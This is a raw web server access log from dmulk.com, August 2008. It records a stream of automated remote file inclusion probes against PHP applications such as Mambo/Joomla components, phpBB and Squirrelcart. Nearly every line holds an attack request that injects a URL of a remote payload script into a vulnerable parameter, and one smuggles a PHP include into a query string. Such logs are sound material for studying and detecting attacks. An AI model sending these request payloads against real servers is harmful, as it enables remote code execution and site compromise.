193.188.66.6 - - [07/Aug/2008:10:37:47 -0700] "GET /logs/access_080218.log///vwar/backup/errors.php?error=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.169.46.98 - - [07/Aug/2008:10:37:48 -0700] "GET /logs/access_080218.log/vwar/backup/errors.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
217.18.75.8 - - [07/Aug/2008:10:38:03 -0700] "GET /logs/admin/classes/TplLoad.php?full_path_to_public_program=http://manga-scan.siteburg.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.18.75.8 - - [07/Aug/2008:10:38:04 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://manga-scan.siteburg.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:10:38:36 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:10:38:39 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 200 18485 "-" "libwww-perl/5.812" "www.dmulk.com"
213.150.174.14 - - [07/Aug/2008:10:39:30 -0700] "GET /logs/access_080130.log HTTP/1.0" 200 667419 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:10:39:59 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 59573 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:10:40:02 -0700] "GET //?path%5Bdocroot%5D=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 18409 "-" "libwww-perl/5.79" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:10:40:16 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:10:40:16 -0700] "GET /phphtml.php?htmlclass_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:10:40:17 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.236.10.71 - - [07/Aug/2008:10:40:27 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.zory.info/public_includes/pub_modules/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
213.236.10.71 - - [07/Aug/2008:10:40:27 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://www.zory.info/public_includes/pub_modules/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
216.193.201.57 - - [07/Aug/2008:10:40:53 -0700] "GET /logs/access_071222.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/wedangrondo/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
84.16.235.79 - - [07/Aug/2008:10:41:15 -0700] "GET /logs/access_080220.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
98.214.215.84 - - [07/Aug/2008:10:41:17 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 200 344118 "http://www.vfrdiscussion.com/forum/index.php?s=3cdac4d12510a4778be6eed645ce8bd4&showtopic=36984&st=0&p=522096&#entry522096" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
72.248.189.215 - - [07/Aug/2008:10:42:06 -0700] "GET /logs/access_080227.log//?path%5Bdocroot%5D=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:10:42:07 -0700] "GET //?path%5Bdocroot%5D=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 18409 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:10:42:08 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 59573 "-" "libwww-perl/5.65" "www.dmulk.com"
82.165.253.72 - - [07/Aug/2008:10:42:29 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.telefranz.de/images/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.253.72 - - [07/Aug/2008:10:42:29 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.telefranz.de/images/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:10:42:41 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 59573 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:10:42:43 -0700] "GET //?path%5Bdocroot%5D=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 18409 "-" "libwww-perl/5.65" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:10:43:17 -0700] "GET /logs/access.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:10:43:17 -0700] "GET /logs/access.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:10:43:18 -0700] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:10:43:18 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:10:43:18 -0700] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:10:43:19 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:10:43:48 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.154.39.71 - - [07/Aug/2008:10:44:03 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.telefranz.de/images/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
79.37.236.150 - - [07/Aug/2008:10:44:03 -0700] "GET /logs/index.php?redir=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.37.236.150 - - [07/Aug/2008:10:44:06 -0700] "GET /index.php?redir=http://illeganza.altervista.org/id.txt? HTTP/1.1" 200 18395 "-" "libwww-perl/5.805" "www.dmulk.com"
80.231.0.98 - - [07/Aug/2008:10:44:06 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:10:44:07 -0700] "GET /logs/access_080109.log//bbs/include/print_category.php?setup[use_category]=1&dir=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:10:44:08 -0700] "GET /logs/access_080109.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:10:44:11 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/maros_cool/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:10:44:12 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/maros_cool/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:10:44:12 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/maros_cool/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.201.66 - - [07/Aug/2008:10:44:13 -0700] "GET /logs/access_080127.log//bemarket/postscript/postscript.php?p_mode=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [07/Aug/2008:10:44:13 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [07/Aug/2008:10:44:13 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [07/Aug/2008:10:44:40 -0700] "GET /logs/access_080127.log//bemarket/postscript/postscript.php?p_mode=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [07/Aug/2008:10:44:41 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [07/Aug/2008:10:44:41 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:10:44:46 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/maros_cool/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:10:44:46 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/maros_cool/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:10:44:47 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/maros_cool/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.201.66 - - [07/Aug/2008:10:44:52 -0700] "GET /logs/access_080404.log//bemarket/postscript/postscript.php?p_mode=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [07/Aug/2008:10:44:57 -0700] "GET /logs/access_080404.log//bemarket/postscript/postscript.php?p_mode=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
117.74.97.174 - - [07/Aug/2008:10:45:33 -0700] "GET /logs/access_080218.log HTTP/1.1" 200 524288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
193.188.66.6 - - [07/Aug/2008:10:45:40 -0700] "GET /logs/access_080127.log//bemarket/postscript/postscript.php?p_mode=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.188.66.6 - - [07/Aug/2008:10:45:40 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.188.66.6 - - [07/Aug/2008:10:45:40 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.169.46.98 - - [07/Aug/2008:10:45:41 -0700] "GET /logs/access_080127.log/bemarket/postscript/postscript.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
217.169.46.98 - - [07/Aug/2008:10:45:41 -0700] "GET /logs/bemarket/postscript/postscript.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
217.169.46.98 - - [07/Aug/2008:10:45:41 -0700] "GET /bemarket/postscript/postscript.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
72.248.189.215 - - [07/Aug/2008:10:45:44 -0700] "GET /logs/access_080309.log//?path%5Bdocroot%5D=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:10:45:56 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/maros_cool/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.132.144.66 - - [07/Aug/2008:10:46:21 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:10:46:26 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/maros_cool/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.188.66.6 - - [07/Aug/2008:10:46:31 -0700] "GET /logs/access_080404.log//bemarket/postscript/postscript.php?p_mode=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.169.46.98 - - [07/Aug/2008:10:46:32 -0700] "GET /logs/access_080404.log/bemarket/postscript/postscript.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
67.19.204.226 - - [07/Aug/2008:10:46:49 -0700] "GET /logs/access_080105.log/lib/gore.php?libpath=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.204.226 - - [07/Aug/2008:10:46:49 -0700] "GET /lib/gore.php?libpath=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.204.226 - - [07/Aug/2008:10:46:49 -0700] "GET /logs/lib/gore.php?libpath=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.34.86.148 - - [07/Aug/2008:10:47:10 -0700] "GET /logs/access_080114.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
216.193.201.57 - - [07/Aug/2008:10:47:15 -0700] "GET /logs/access_080124.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/wedangrondo/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
201.0.140.61 - - [07/Aug/2008:10:47:24 -0700] "GET /logs/access_080114.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
70.86.186.90 - - [07/Aug/2008:10:47:44 -0700] "GET /logs/access_080127.log/modules/projects/vw_files.php?dPconfig[root_dir]=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.186.90 - - [07/Aug/2008:10:47:45 -0700] "GET /modules/projects/vw_files.php?dPconfig[root_dir]=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.186.90 - - [07/Aug/2008:10:47:45 -0700] "GET /logs/modules/projects/vw_files.php?dPconfig[root_dir]=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.161.171 - - [07/Aug/2008:10:48:01 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.161.171 - - [07/Aug/2008:10:48:03 -0700] "GET /?sourcedir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 18375 "-" "libwww-perl/5.810" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:10:48:10 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:10:48:10 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:10:48:11 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:10:48:11 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
194.165.49.171 - - [07/Aug/2008:10:48:28 -0700] "GET /logs/access_080225.log//index.php?option=com_mtree&task=listcats&cat_id=1792&Itemid=35&mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/un.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.165.49.171 - - [07/Aug/2008:10:48:31 -0700] "GET //index.php?option=com_mtree&task=listcats&cat_id=1792&Itemid=35&mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/un.txt? HTTP/1.1" 200 18707 "-" "libwww-perl/5.805" "www.dmulk.com"
194.165.49.171 - - [07/Aug/2008:10:48:32 -0700] "GET /logs//index.php?option=com_mtree&task=listcats&cat_id=1792&Itemid=35&mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/un.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.42.218.66 - - [07/Aug/2008:10:48:45 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.42.218.66 - - [07/Aug/2008:10:48:45 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.42.218.66 - - [07/Aug/2008:10:48:45 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.13.221.182 - - [07/Aug/2008:10:49:12 -0700] "GET /logs/access_080113.log//errors.php?error=http://www.naturopathic.org/images/bulletins/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.13.221.182 - - [07/Aug/2008:10:49:12 -0700] "GET //errors.php?error=http://www.naturopathic.org/images/bulletins/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.13.221.182 - - [07/Aug/2008:10:49:12 -0700] "GET /logs//errors.php?error=http://www.naturopathic.org/images/bulletins/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:10:49:19 -0700] "GET ///squirrelcart/cart_content.php?cart_isp_root=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:10:49:19 -0700] "GET /logs///squirrelcart/cart_content.php?cart_isp_root=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:10:49:20 -0700] "GET /logs/access_080209.log///squirrelcart/cart_content.php?cart_isp_root=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
69.42.218.66 - - [07/Aug/2008:10:49:29 -0700] "GET /popup.php?path=http://www.geocities.com/metal_lord64/bat/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
69.42.218.66 - - [07/Aug/2008:10:49:31 -0700] "GET /logs/popup.php?path=http://www.geocities.com/metal_lord64/bat/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
69.13.221.182 - - [07/Aug/2008:10:49:54 -0700] "GET /logs/access_080122.log//errors.php?error=http://www.naturopathic.org/images/bulletins/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.105.211.65 - - [07/Aug/2008:10:49:57 -0700] "GET /logs/access_080120.log HTTP/1.0" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:10:50:00 -0700] "GET ///squirrelcart/cart_content.php?cart_isp_root=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:10:50:00 -0700] "GET /logs///squirrelcart/cart_content.php?cart_isp_root=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:10:50:00 -0700] "GET /logs/access_080209.log///squirrelcart/cart_content.php?cart_isp_root=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:10:50:05 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:10:50:06 -0700] "GET /?sourcedir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 18391 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:10:50:08 -0700] "GET /logs/?sourcedir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 59568 "-" "libwww-perl/5.65" "www.dmulk.com"
80.154.39.71 - - [07/Aug/2008:10:50:10 -0700] "GET /logs/access_080126.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.telefranz.de/images/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.154.39.71 - - [07/Aug/2008:10:50:10 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.telefranz.de/images/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.154.39.71 - - [07/Aug/2008:10:50:11 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.telefranz.de/images/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.2.18.19 - - [07/Aug/2008:10:50:15 -0700] "GET /logs/access_080218.log HTTP/1.0" 200 622413 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
91.124.77.159 - - [07/Aug/2008:10:50:32 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
205.178.184.113 - - [07/Aug/2008:10:50:48 -0700] "GET /logs/access_080114.log HTTP/1.1" 200 566288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
212.97.132.101 - - [07/Aug/2008:10:50:48 -0700] "GET /logs/access_080226.log/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
212.97.132.101 - - [07/Aug/2008:10:50:49 -0700] "GET /components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=uid=398(httpd)%20gid=398(httpd)%20groups=398(httpd)%0A? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
194.165.49.171 - - [07/Aug/2008:10:50:53 -0700] "GET //index.php?option=com_mtree&task=listcats&cat_id=1792&Itemid=35&mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/un.txt? HTTP/1.1" 200 18707 "-" "libwww-perl/5.805" "www.dmulk.com"
88.214.192.29 - - [07/Aug/2008:10:50:58 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://bloggreenwood.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [07/Aug/2008:10:50:58 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://bloggreenwood.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [07/Aug/2008:10:51:00 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://bloggreenwood.com/v6id.txt???? HTTP/1.1" 200 3694 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.161.171 - - [07/Aug/2008:10:51:12 -0700] "GET /logs/?sourcedir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 59568 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.161.171 - - [07/Aug/2008:10:51:14 -0700] "GET /?sourcedir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 18391 "-" "libwww-perl/5.810" "www.dmulk.com"
88.214.192.29 - - [07/Aug/2008:10:51:21 -0700] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://bloggreenwood.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.18.75.8 - - [07/Aug/2008:10:51:21 -0700] "GET /logs/access_080404.log//bemarket/postscript/postscript.php?p_mode=http://manga-scan.siteburg.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
